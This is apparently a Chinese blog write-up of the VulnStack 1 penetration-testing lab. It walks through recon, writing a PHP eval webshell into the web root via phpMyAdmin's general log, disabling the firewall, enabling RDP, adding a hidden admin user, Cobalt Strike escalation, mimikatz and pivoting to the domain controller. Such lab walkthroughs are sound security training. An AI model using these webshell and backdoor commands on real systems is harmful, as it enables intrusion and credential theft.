VulnStack 1 wp

V

环境搭建

官网下载好对应的虚拟机,直接在 VMware 里打开对应文件夹下的 vmx 文件即可完成安装。这个靶机里有三台服务器需要我们 getshell 并提权,再加上我们自己要开一台 kali 负责渗透,所以建议使用 16g 以上内存的电脑,我的电脑启动四个虚拟机之后再加上本机的 Chrome 微信等等应用,内存占用大概是 13 – 14g,还是有点极限。

把三台靶机全部开机,口令都是 hongrisec@2019 除了 win7 之外的两台 server 都需要设置密码,我全部设置成了 hongrisec@2020;此外,还要把 kali 划分到同一网段中,这个环境的简单拓扑图如下:

之后切换到 Win7,启动 C:\phpstudy\ 中的 phpstudy,如果报错就重启下,用 kali 访问 192.168.72.129,能看到 php 探针就说明环境配好了。

信息收集 && 随手一试

可以在 Kali 里使用 netdiscover 来发现当前网段的 host:

netdiscover -i eth0 -r 192.168.72.0/24

129 就是 Win7 的 ip 地址,看来这个 ip 段没有其他主机,接着用 nmap 简单扫一下端口:

3306 对应 mysql 服务,php 探针上还有个检测数据库连接的功能,可以尝试爆破口令( 当然探针这里也可以看开启了哪些服务 ),随手一试 root/root 竟然连接成功,但是从远程连接发现被禁了:

那就接着试试扫目录,掏出祖传御剑:

竟然有 phpmyadmin,直接登陆上去无脑 into outfile,发现报错,查了下 secure_file_priv 是 NULL,但是可以把马写日志里:

set global general_log = On
set global general_log_file='C:/phpStudy/www/evil.php'
select "<?php eval($_POST['a']);?>"
成功 getshell

拿下内网

没想到这么简单就拿到了第一个 shell,那接着来收集下信息,可以得知:

  • 有域环境
  • 当前用户 god\administrator
  • 域控 \\owa.god.org
  • 64 位系统

既然有域环境,那就还能接着搞,用 netsh firewall set opmode disable 帮他把防火墙关一下。再添加一个管理员权限的用户,按理说就可以成功远程登录上了:

netsh firewall set opmode disable # 关闭防火墙
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f # 打开 3389
net user imagin 111@aaa /add # 添加用户
net localgroup administrator imagin /add # 新建用户放到管理组

但是这个 win7 即使用刚创建的账户登录,还是会挤掉管理员,所以这个方法行不通,还是得用 cs。于是坑点又来了,明明查到的系统是 64 位,然而 64 位的马却跑不通,换了 32 位的才成功上线。

上线之后可以试试一键提权,可能这个靶机比较简单,竟然真的提到了 system(列表视图右键 session => access => Elevate,或者用 beacon 命令 elevate svc-exe ListenerName)之后切换到目标视图对网络进行嗅探(或者输入 beacon 命令 net view),可以得到内网 192.168.52.0/24 的存活主机。

这时候就可以尝试去撞一下弱口令或者重复口令了,先把当前机器的 hash dump 出来,再 run mimikatz 就可以爆出其中一个明文:

由于 Kali 在 192.168.72.0/24 这个网段,无法直接访问到内网的机器,因此我们需要使用 smb 来做一个代理,在 cs 手册里是这样介绍 smb beacon 的:

SMB Beacon 使用命名管道通过一个父 Beacon 进行通信。这种对等通信对同一台主机上的 Beacon 和 跨网络的 Beacon 都有效。Windows 将命名管道通信封装在 SMB 协议中。因此得名 SMB Beacon。

新建一个 Beacon SMB 的 Listener,使用刚刚爆出的明文就可以直接登录域控:

当然这是由于我们给域控配置了和跳板机相同的口令才导致如此轻易的 getshell,但是换个思路既然域控支持 SMB 协议,那 445 端口大概率是开启的,可以直接永恒之蓝走一波 getshell:

一点点总结

这个靶机比较简单,主要是对一些工具的使用和对域环境的理解。做惯了 ctf,这种靶机一下一个 shell 的感觉还是挺爽的,就是下载有点费劲 2333。

Imagin 丨 京ICP备18018700号-1


Your sidebar area is currently empty. Hurry up and add some widgets.